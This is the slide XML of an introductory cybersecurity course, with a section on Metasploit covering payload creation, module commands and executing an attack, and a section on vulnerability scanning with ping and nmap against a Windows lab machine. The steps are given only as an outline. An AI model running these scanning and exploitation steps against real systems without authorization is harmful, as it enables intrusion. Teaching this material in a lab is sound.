              <a:off x="7963535" y="4158564"/>
              <a:ext cx="638810" cy="639445"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="638809" h="639445">
                  <a:moveTo>
                    <a:pt x="483870" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="319405" y="164718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154940" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="154736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164719" y="319709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="484682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154940" y="639406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319405" y="474700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="483870" y="639406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="638810" y="484682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="474091" y="319709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="638810" y="154736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4838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2" name="object 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40ACF5F6-2C0C-9607-975D-E3ADEB79CD76}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7963535" y="4158564"/>
              <a:ext cx="638810" cy="639445"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="638809" h="639445">
                  <a:moveTo>
                    <a:pt x="0" y="154736"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="154940" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319405" y="164718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="483870" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="638810" y="154736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="474091" y="319709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="638810" y="484682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="483870" y="639406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319405" y="474700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154940" y="639406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="484682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164719" y="319709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="154736"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25907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9" name="object 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51D29CD4-A870-CF09-0A7A-CF17E216A166}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5169306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0" name="object 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56E88C27-CA51-E8AA-20AF-DE5155D09A76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5169306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121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71366286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AA8A50-8166-A559-C36D-5A6684A3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142404D-EF37-BD35-DF95-9FB0C3619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67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CDDE982B-9C8D-E887-7DC9-1BE783C6E2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7287DD81-6531-623A-5DDE-911684D655ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-13843" y="1034669"/>
            <a:ext cx="9173210" cy="3347085"/>
            <a:chOff x="-13843" y="1034669"/>
            <a:chExt cx="9173210" cy="334708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856FB9F2-8DA9-D6D5-CDF3-12DE1A9F61EB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65BDAFD5-61C5-2ADC-36E1-E9A80590FD36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B3ECAA46-DBA5-64BA-A6D9-3725DC0937A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128F8904-1F03-9FD4-C32B-A4C2CDE00443}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411276" y="114045"/>
            <a:ext cx="7936052" cy="685957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 altLang="en-US" spc="-10" dirty="0"/>
              <a:t>Introduction to Cybersecurity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" spc="-10" dirty="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B3DB5AC5-A3B1-59EB-F3BD-E024DC33E61D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688340" y="1165352"/>
            <a:ext cx="3288029" cy="2380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pc="-10" dirty="0"/>
              <a:t>3-Metasploit Tool:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="65"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" spc="-10" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="688340" lvl="1" indent="-351790">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="688340" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Introduction To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Metasplot</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="688340" lvl="1" indent="-351790">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="688340" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Create payload </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="688340" lvl="1" indent="-351790">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="688340" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Command in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="688340" lvl="1" indent="-351790">
              <a:lnSpc>
                <a:spcPts val="1835"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="688340" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Scan vulnerability</a:t>
            </a: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92216CB7-6669-757C-9A6D-5EA5595A3789}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="610362" y="1735073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E57D6A9F-FC63-59D7-749B-1F48CB9DDF6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CF5CB09E-4780-3E69-FFBF-417F733C43D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122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418308772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FD68BE-A5DF-5408-2D00-92A728C43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4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="133350"/>
            <a:ext cx="8610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3065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CA99A-87C4-DF12-4342-7182E921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9" r="20094" b="29851"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="666750"/>
            <a:ext cx="2133600" cy="35814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ED3A6F-D247-4E65-641C-50A975B61ADC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="2724150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BC478AB-E198-6EFB-2B7F-71F296ED40DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="142875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msf6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10B6B8-E178-6F79-2F98-BBE233C61D13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3362093" y="1966098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2753EA-6C26-9C79-5BA8-ADE91E620731}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3362093" y="2513671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9AF757-AED1-573B-5EE7-00EA488AA2D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3362093" y="3096322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DDB53-F2EC-CDE4-6B8B-B7E215189CC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="3664105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exploit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0867C4BD-AE05-D717-7EB9-4905DD069933}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="2804299"/>
            <a:ext cx="2028593" cy="17486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E270FEE-A100-3232-21B1-E6FE805D1752}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4191000" y="4400550"/>
            <a:ext cx="4953000" cy="7429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used to write commands and navigate between modules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987986-FEA9-E198-6428-926B40A4EA26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="165735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313A50-EBE4-1E49-FF18-714B813E62D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="10" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657493" y="2194698"/>
            <a:ext cx="7527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50C1BA-8534-1029-C260-7539B9B2696C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657493" y="2742271"/>
            <a:ext cx="7527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E5F751-0127-ED1A-E19A-6E415CDFD240}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="12" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657493" y="3324922"/>
            <a:ext cx="7527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7CB5C8-1833-AC0F-80EA-5E0CDB23D8BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="13" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="3892705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94146AA-CF2C-82DC-FB76-B1D1A4B07DD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="1435720"/>
            <a:ext cx="2743200" cy="45720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Ready command line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DDF936-44B2-AD7C-D547-5961DBB5ED8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="1973996"/>
            <a:ext cx="2743200" cy="45720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search for vuln  or modules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9DEEB0-3ED5-AE52-660F-1B4A46EC930F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="2513670"/>
            <a:ext cx="2743200" cy="45720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use a specific module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8BF30-A26B-710A-C57D-F44641B815E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="3082843"/>
            <a:ext cx="2743200" cy="45720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set module options such as IP and Port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2EA798-6DAC-B9F4-CB27-50B6DB052356}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="3652488"/>
            <a:ext cx="2743200" cy="45720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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>exeute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> the attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24933601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9970892-DDBB-4CD8-5239-B9D73EB40307}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6983476" y="185828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JO" sz="3600" b="1" spc="-25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>3.2</a:t>
            </a:r>
            <a:endParaRPr sz="3600" dirty="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BE3A03E-E890-EA17-46FC-B34D4D147492}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3769361" y="4766051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85921F2-B941-7493-8614-7FDC66ACCE55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3769361" y="4776697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125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4FFE431-839E-5E78-C167-6EB1B61F2FCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="2343150"/>
            <a:ext cx="5331460" cy="10708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336550" lvl="1">
              <a:lnSpc>
                <a:spcPts val="1835"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="688340" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Scan</a:t>
            </a:r>
            <a:endParaRPr lang="ar-JO" sz="6000" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="336550" lvl="1">
              <a:lnSpc>
                <a:spcPts val="1835"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="688340" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="ar-JO" sz="6000" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="336550" lvl="1">
              <a:lnSpc>
                <a:spcPts val="1835"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="688340" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="ar-JO" sz="6000" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="336550" lvl="1">
              <a:lnSpc>
                <a:spcPts val="1835"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="688340" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>vulnerability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34312517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1BB543-4962-D236-5030-7C0341FF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BF3377-6D58-8029-D303-A72AF8B50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67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478791E-F047-6C34-741A-A0EABEA699D6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0E4533F-A1E3-80D9-025A-D76CA870C08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3BEF675E-1E18-57F9-D3F4-48F3C2B306D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126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19A2BAD-3240-7F68-130F-5A896431C3E3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3B960B0A-EBEB-93C6-7101-C946F9B7A0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C58A70F1-E7E8-7713-56C1-2D7EB91B217C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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84F2D978-19CE-1D5B-C6AE-23D61F653DAB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7182169-62AF-63BD-CFEF-EBEC7E53160A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D12971ED-6537-EBCD-4D87-2E4C53FA19A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63D3AECA-F88D-831A-E79F-D583AABE460C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Metasploit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E94E4EE8-D7F5-E091-A2D9-6EB8DCBB21E8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ABA02ED9-D75A-1A35-7338-26D427CDA1C5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126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EB0EE378-38DE-E854-BA4E-90CA86148959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3.2  Scan Vulnerability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163244F4-3CBA-B8B1-6634-4E924C625177}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467583" y="1915698"/>
            <a:ext cx="29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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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23DC95-822C-366C-5E85-C52830F9856D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1718768" y="2056879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49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F65902C3-A22B-6B4E-2524-D2FFCF7F25D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314065" y="1861486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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> address kali 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BEA7D00A-D168-BD85-90A6-2FF617116AC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599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-ipconfig      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A794BC-D6B9-7F8F-540C-3D72618F2194}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2625398" y="2503861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 Box 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{029446FB-6E47-6CA7-2025-0D2FDEEC5F63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4139996" y="2313214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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> address windows</a:t>
            </a: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E3901E41-DF07-3B54-13C7-81570AB80933}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599" y="2724150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ping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> windows   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   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738CE3E-86AE-C840-1341-803C21248657}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2612097" y="2926327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Text Box 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CD5B666-12A2-4E79-9C4C-09FE2B150818}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4137254" y="2749550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connection kali and windows </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{147562C9-3D1D-AD62-8C41-BEAE18282716}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3184323"/>
            <a:ext cx="331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 err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> windows </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{293B74EE-A33F-958A-27AD-EC067CC3C282}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4379301" y="3209200"/>
            <a:ext cx="36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ports open on windows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8328F0-5F6A-2057-5C59-3D209B7C9AFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2675890" y="3406186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FD5E1A-05B0-EA95-4103-79F1F35EA482}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2945447" y="3835764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2" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F22380E-142F-E363-B0AB-AE823DE04FE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3603453"/>
            <a:ext cx="30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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> –script-updated  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A3E92FC-5EDF-3FE2-D778-21C956F690E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4339057" y="3661575"/>
